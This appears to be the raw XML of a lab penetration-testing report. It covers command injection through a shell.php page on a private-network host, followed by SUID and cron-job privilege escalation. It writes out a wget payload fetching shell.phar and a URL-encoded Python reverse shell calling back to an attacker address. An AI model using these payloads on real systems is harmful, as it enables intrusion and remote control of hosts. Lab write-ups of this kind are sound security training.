        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251692032" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="065E1983" wp14:editId="247F78CF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485714" cy="247619"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="19990"/>
                <wp:lineTo x="21465" y="19990"/>
                <wp:lineTo x="21465" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="49275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574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C31D9" w14:textId="77777777" w:rsidR="00B23458" w:rsidRDefault="00B23458"/>
    <w:p w14:paraId="6709AD45" w14:textId="1A5AC3AD" w:rsidR="00B23458" w:rsidRDefault="00DE4834" w:rsidP="00DE4834">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc148006705"/>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251694080" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6E656305" wp14:editId="27119020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2552381" cy="352381"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="19884"/>
                <wp:lineTo x="21444" y="19884"/>
                <wp:lineTo x="21444" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="123227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746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C62">
        <w:t>Command Injection</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w14:paraId="78825318" w14:textId="4F288333" w:rsidR="00B33C62" w:rsidRDefault="006D73F8">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251696128" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="13D6B37D" wp14:editId="18EA54E9">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-38100</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>272415</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2790476" cy="257143"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="19248"/>
                <wp:lineTo x="21384" y="19248"/>
                <wp:lineTo x="21384" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="43852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266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E30">
        <w:t xml:space="preserve">Finding </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00026E30">
        <w:t>shell.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00026E30">
        <w:t xml:space="preserve"> reveals some text.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="041BE34A" w14:textId="60BF0658" w:rsidR="00B23458" w:rsidRDefault="00C0006C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251698176" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="120F565C" wp14:editId="5468A8FB">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-44450</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>285115</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4180952" cy="304762"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="20292"/>
                <wp:lineTo x="21456" y="20292"/>
                <wp:lineTo x="21456" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="114512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74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3F8">
        <w:t>I tried the following.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A1FE21C" w14:textId="2F4C277D" w:rsidR="00B23458" w:rsidRDefault="003E59F6">
      <w:r>
        <w:t xml:space="preserve">Now I can maybe view </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>passwords, or</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> create reverse shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43CB096C" w14:textId="77777777" w:rsidR="002E67DD" w:rsidRDefault="002E67DD"/>
    <w:p w14:paraId="1CC44C46" w14:textId="37989F4D" w:rsidR="002E67DD" w:rsidRDefault="002E67DD">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>I will set up a python simple server and then download the file using the get command.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3156A4DE" w14:textId="338F8539" w:rsidR="00B23458" w:rsidRDefault="00F8789F">
      <w:r w:rsidRPr="00F8789F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00F8789F">
        <w:t>http://192.168.56.158/shell.php?cmd=wget%20http://192.168.56.101/shell.ph</w:t>
      </w:r>
      <w:r w:rsidR="00A02B42">
        <w:t>ar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34D0C2E2" w14:textId="13197EB0" w:rsidR="00B23458" w:rsidRDefault="00EE0DD9">
      <w:r w:rsidRPr="00A02B42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017DCDC7" wp14:editId="0BD07C52">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-6350</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>208915</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5731510" cy="535305"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="20754"/>
                <wp:lineTo x="21538" y="20754"/>
                <wp:lineTo x="21538" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="178918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848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B42" w:rsidRPr="00A02B42">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Encoded</w:t>
      </w:r>
      <w:r w:rsidR="00A02B42">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00BC4781" w:rsidRPr="00BC4781">
        <w:t>wget%20http%3A%2F%2F192.168.56.101%2Fshell.phar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BB5A76B" w14:textId="562C1AFC" w:rsidR="00B23458" w:rsidRDefault="00EE0DD9">
      <w:r>
        <w:t>It worked, but I didn’t get a shell established.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5459D995" w14:textId="03710539" w:rsidR="00B23458" w:rsidRDefault="00A85769">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251702272" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7682358B" wp14:editId="21E2210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257143" cy="885714"/>
            <wp:effectExtent l="0" t="0" r="1270" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="20918"/>
                <wp:lineTo x="21527" y="20918"/>
                <wp:lineTo x="21527" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="433104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0447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6E25E" w14:textId="7B40E3D3" w:rsidR="00B23458" w:rsidRDefault="00B23458"/>
    <w:p w14:paraId="6F8F08DB" w14:textId="77777777" w:rsidR="00B23458" w:rsidRDefault="00B23458"/>
    <w:p w14:paraId="6F4108A3" w14:textId="77777777" w:rsidR="00B23458" w:rsidRDefault="00B23458"/>
    <w:p w14:paraId="5911B01B" w14:textId="59DA2031" w:rsidR="00B23458" w:rsidRDefault="00A85769">
      <w:r>
        <w:t>Maybe a python reverse shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F70D698" w14:textId="118E3085" w:rsidR="00A31D73" w:rsidRPr="00A31D73" w:rsidRDefault="00A31D73" w:rsidP="00A31D73">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-AU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-AU"/>
        </w:rPr>
        <w:t>…?cmd=</w:t>
      </w:r>
      <w:r w:rsidRPr="00A31D73">
        <w:rPr>
          <w:lang w:eastAsia="en-AU"/>
        </w:rPr>
        <w:t>export%20RHOST=%22192.168.56.101%22;export%20RPORT=9999;python%20-c%20'import%20sys,socket,os,pty;s=socket.socket();s.connect((os.getenv(%22RHOST%22),int(os.getenv(%22RPORT%22))));%5Bos.dup2(s.fileno(),fd)%20for%20fd%20in%20(0,1,2)%5D;pty.spawn(%22/bin/bash%22)'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="407EAE73" w14:textId="2C535D7D" w:rsidR="00B23458" w:rsidRDefault="00870AA6" w:rsidP="00A31D73">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251704320" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="332C91A3" wp14:editId="551BD1E2">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>2806700</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>4445</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3460115" cy="844550"/>
            <wp:effectExtent l="0" t="0" r="6985" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="20950"/>
                <wp:lineTo x="21525" y="20950"/>
                <wp:lineTo x="21525" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="853319722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19722" name="Picture 1" descr="A computer screen shot of a black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850">
        <w:t>YES, I am in.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="696D0EF0" w14:textId="4FD0250A" w:rsidR="00B23458" w:rsidRDefault="00870AA6">
      <w:r>
        <w:t xml:space="preserve">Sites used: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36142BFC" w14:textId="7E864CBA" w:rsidR="00870AA6" w:rsidRDefault="00870AA6" w:rsidP="00870AA6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink r:id="rId29" w:history="1">
        <w:r w:rsidRPr="001722BF">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.urlencoder.org/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="792FCD68" w14:textId="36BDDDB5" w:rsidR="00B23458" w:rsidRDefault="00870AA6" w:rsidP="00443CEF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00870AA6">
        <w:t>https://weibell.github.io/reverse-shell-generator/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="224DF957" w14:textId="0EA26363" w:rsidR="00417B86" w:rsidRDefault="00417B86" w:rsidP="00443CEF">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc148006706"/>
      <w:r>
        <w:t>Escalation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w14:paraId="20A9D0FE" w14:textId="3EFF97F3" w:rsidR="00E958FA" w:rsidRPr="00E958FA" w:rsidRDefault="00E958FA" w:rsidP="005A65BD">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc148006707"/>
      <w:r>
        <w:t>Upgrade Shell</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w14:paraId="67E82710" w14:textId="7D9D0791" w:rsidR="00417B86" w:rsidRDefault="00B220FE">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251706368" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3E1C24CE" wp14:editId="678FA70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94585" cy="660400"/>
            <wp:effectExtent l="0" t="0" r="5715" b="6350"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21185"/>
                <wp:lineTo x="21480" y="21185"/>
                <wp:lineTo x="21480" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="114617976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9769" name="Picture 1" descr="A computer screen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59256" w14:textId="463C88DA" w:rsidR="00B23458" w:rsidRDefault="004969E7">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251712512" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="16D8E32F" wp14:editId="097A7985">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>3714750</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>236220</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2362200" cy="2632075"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21418"/>
                <wp:lineTo x="21426" y="21418"/>
                <wp:lineTo x="21426" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="7373184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18447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92B5F" w14:textId="267973B5" w:rsidR="00B23458" w:rsidRDefault="00B220FE">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251708416" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="63EF369B" wp14:editId="0A652E98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900680" cy="158750"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="18144"/>
                <wp:lineTo x="21420" y="18144"/>
                <wp:lineTo x="21420" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="149625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544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1348" cy="159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28474" w14:textId="4FD28471" w:rsidR="00B23458" w:rsidRDefault="00B220FE">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251710464" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5A2FB7B8" wp14:editId="63CCB84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800350" cy="147955"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="19468"/>
                <wp:lineTo x="21453" y="19468"/>
                <wp:lineTo x="21453" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="55655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574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B054E" w14:textId="6598B03F" w:rsidR="00B23458" w:rsidRDefault="00B23458"/>
    <w:p w14:paraId="08A793C4" w14:textId="73F094A2" w:rsidR="00B23458" w:rsidRDefault="008D11CF" w:rsidP="00B8796C">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc148006708"/>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251714560" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="41DABB74" wp14:editId="66C783D6">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>-215900</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>244475</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3880485" cy="165100"/>
            <wp:effectExtent l="0" t="0" r="5715" b="6350"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="19938"/>
                <wp:lineTo x="21526" y="19938"/>
                <wp:lineTo x="21526" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="69594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17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9E7">
        <w:t>Finding SUID Binaries</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w14:paraId="67350564" w14:textId="1FF4DE3A" w:rsidR="00B23458" w:rsidRDefault="008D11CF">
      <w:r>
        <w:t>Running this command shows that in user directory 3,5 contain scripts or binaries that can be exploited.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28C40656" w14:textId="77777777" w:rsidR="00B91F08" w:rsidRDefault="00B91F08"/>
    <w:p w14:paraId="775E925D" w14:textId="77777777" w:rsidR="00B91F08" w:rsidRDefault="00B91F08"/>
    <w:p w14:paraId="68785616" w14:textId="2563C28F" w:rsidR="00B91F08" w:rsidRDefault="0082162D" w:rsidP="00297841">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc148006709"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>User 3 Exploit – Binary with SUID</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w14:paraId="291E33FE" w14:textId="7F2BA9CF" w:rsidR="0082162D" w:rsidRDefault="00D0393A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251716608" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6BA40EF0" wp14:editId="491E5D70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44932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473" y="21419"/>
                <wp:lineTo x="21473" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="1635575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7548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DA9F5" w14:textId="71D9A930" w:rsidR="00B23458" w:rsidRDefault="00B23458"/>
    <w:p w14:paraId="7C8E0049" w14:textId="77777777" w:rsidR="00B23458" w:rsidRDefault="00B23458"/>
    <w:p w14:paraId="2223D917" w14:textId="77777777" w:rsidR="00B23458" w:rsidRDefault="00B23458"/>
    <w:p w14:paraId="0626DDE9" w14:textId="77777777" w:rsidR="00B23458" w:rsidRDefault="00B23458"/>
    <w:p w14:paraId="767596CF" w14:textId="77777777" w:rsidR="00B23458" w:rsidRDefault="00B23458"/>
    <w:p w14:paraId="3D78E8B8" w14:textId="1ED83741" w:rsidR="00B23458" w:rsidRDefault="0082162D">
      <w:r>
        <w:t>This file contains C code that spawns a privileged shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="179E948D" w14:textId="4EF6BD1A" w:rsidR="00B23458" w:rsidRDefault="00C77088" w:rsidP="00D55254">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc148006710"/>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251718656" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2D4794AE" wp14:editId="6AC171F3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731510" cy="168910"/>
            <wp:effectExtent l="0" t="0" r="2540" b="2540"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="19489"/>
                <wp:lineTo x="21538" y="19489"/>
                <wp:lineTo x="21538" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="8957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32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18F">
        <w:t xml:space="preserve">User 3 Exploit – Writable Script called when executing </w:t>
      </w:r>
      <w:r w:rsidR="00D55254">
        <w:t>SUID</w:t>
      </w:r>
      <w:r w:rsidR="001F118F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="001F118F">
        <w:t>binary</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="5391B0D6" w14:textId="3552B660" w:rsidR="001F118F" w:rsidRDefault="007F4600">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251720704" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="412B4DAD" wp14:editId="58C182B6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638095" cy="380952"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="20554"/>
                <wp:lineTo x="21371" y="20554"/>
                <wp:lineTo x="21371" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="50304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454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1A2B5" w14:textId="3FE8544C" w:rsidR="00B23458" w:rsidRDefault="00B23458"/>
    <w:p w14:paraId="2C7907DB" w14:textId="3C7BF8CF" w:rsidR="00B23458" w:rsidRDefault="007F4600">
      <w:r>
        <w:t>Run the executable that is calling the writable script, then you will have a reverse shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B924EEA" w14:textId="7264497D" w:rsidR="00B23458" w:rsidRDefault="00CC5EA6">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251722752" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6304E0BA" wp14:editId="0C64389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76190" cy="504762"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="20403"/>
                <wp:lineTo x="21518" y="20403"/>
                <wp:lineTo x="21518" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="167204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446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3B6A3" w14:textId="1F2BE7B2" w:rsidR="00B23458" w:rsidRDefault="00B23458"/>
    <w:p w14:paraId="46FB9782" w14:textId="77777777" w:rsidR="00B23458" w:rsidRDefault="00B23458"/>
    <w:p w14:paraId="633D6732" w14:textId="52E17F7C" w:rsidR="00B23458" w:rsidRDefault="00296C38" w:rsidP="00C11409">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Toc148006711"/>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>CronJob</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Privilege Escalation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p w14:paraId="70C00BFC" w14:textId="135FDF27" w:rsidR="00296C38" w:rsidRDefault="00225DF6">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251726848" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3EE8DF52" wp14:editId="60008EA4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561905" cy="390476"/>
            <wp:effectExtent l="0" t="0" r="1270" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="20052"/>
                <wp:lineTo x="21531" y="20052"/>
                <wp:lineTo x="21531" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="90496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656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BED">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251724800" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="31E0F1A5" wp14:editId="7C009A4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009524" cy="180952"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="18254"/>
                <wp:lineTo x="21449" y="18254"/>
                <wp:lineTo x="21449" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="76624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425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10C31" w14:textId="24A14A46" w:rsidR="00B23458" w:rsidRDefault="001051A0">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251728896" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="40532D4D" wp14:editId="5AAB1D2B">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>733425</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5552381" cy="219048"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="18837"/>
                <wp:lineTo x="21494" y="18837"/>
                <wp:lineTo x="21494" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="138694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400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01A">
        <w:t>See how there is a script located in user 4</w:t>
      </w:r>
      <w:r w:rsidR="0022252A">
        <w:t>/Desktop, it runs every minute</w:t>
      </w:r>
      <w:r w:rsidR="00942A6D">
        <w:t xml:space="preserve"> (*/5).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3947B715" w14:textId="7D677928" w:rsidR="00B23458" w:rsidRDefault="007D61BA">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251730944" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="53CD0EA0" wp14:editId="059FFE4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5076190" cy="752381"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="20797"/>
                <wp:lineTo x="21481" y="20797"/>
                <wp:lineTo x="21481" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="1609215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1519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2A9">
        <w:t>It isn’t writable however if I cat the file and look at its contents you will notice something interesting.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41F8F8DF" w14:textId="504B8CDA" w:rsidR="00B23458" w:rsidRDefault="00B23458"/>
    <w:p w14:paraId="7E2257CB" w14:textId="77777777" w:rsidR="00B23458" w:rsidRDefault="00B23458"/>
    <w:p w14:paraId="36F0B6B3" w14:textId="77777777" w:rsidR="00B23458" w:rsidRDefault="00B23458"/>
    <w:p w14:paraId="7DBEEC5D" w14:textId="2347E6F8" w:rsidR="00B23458" w:rsidRDefault="00374A8D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
